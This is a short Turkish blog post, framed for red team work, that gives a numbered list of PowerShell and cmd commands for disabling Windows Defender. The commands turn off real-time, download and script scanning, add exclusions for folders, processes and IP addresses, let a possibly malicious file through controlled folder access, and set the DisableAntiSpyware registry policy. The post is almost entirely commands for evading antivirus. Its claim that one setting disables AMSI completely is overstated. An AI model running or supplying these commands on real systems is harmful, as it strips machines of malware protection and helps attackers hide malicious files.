Red Team operasyonlarında Windows Defender’ı Bypass etme yöntemleri
Merhaba. Bu içerikte Windows Defender’dan nasıl kurtulabileceği hakkında bazı komut satırlarına değiniyor olacağız. Let’s go.
- İlk olarak Windows Defender durumumuz hakkında biraz bilgi alalım.
Get-MpComputerStatus
2. Şimdi biraz proaktif savunmayı devre dışı bırakalım. Defender artık indirilen dosya ve ekler üzerinde AMSI(Antimalware Scan Interface) taraması yapmamasını belirttik.
Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus
Set-MpPreference -DisableIOAVProtection $true
3. AMSI(Antimalware Scan Interface)’yı tamamen devre dışı bıraktık. (0 tekrar etkinleştirmek için kullanılır)
Set-MpPreference -DisableScriptScanning 1
4. Bir dizinimiz var ve Windows Defender buraya ilişmesin istemiyoruz. Yapılacak elbet bir şeyler vardır.
Add-MpPreference -ExclusionPath "<PATH>"
5. Sadece bir dizin yeterli değil bir dosyayı Defender’dan azat etmek istediğimizde;
Set-MpPreference -ExclusionProcess "<PATH>"
6. Bu durum IP adresi içinde geçerli.
Set-MpPreference -ExclusionIpAddress "<IP_Adres>"
7. Mesela bir dosyamız var(zararlı olabilir) ve dosyanın erişimlerini arttırarak kontrol edilmemesini istiyor olabiliriz.
Add-MpPreference -ControlledFolderAccessAllowedApplications "<PATH>"
8. Defender’dan neredeyse tamamen kurtulmak istediğinizde(PowerShell);
Set-MpPreference -DisableRealtimeMonitoring $true; New-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
9. cmd kullanarak neredeyse tamamen kurtulmak istediğinizde;
powershell -command "Set-MpPreference -DisableRealtimeMonitoring $true" && reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD_LITTLE_ENDIAN /d 1 /f
Yazının sonunda bilindik eski ve güzel bir parça ile veda ediyorum. Bir sonraki içeriklerde görüşmek dileği ile.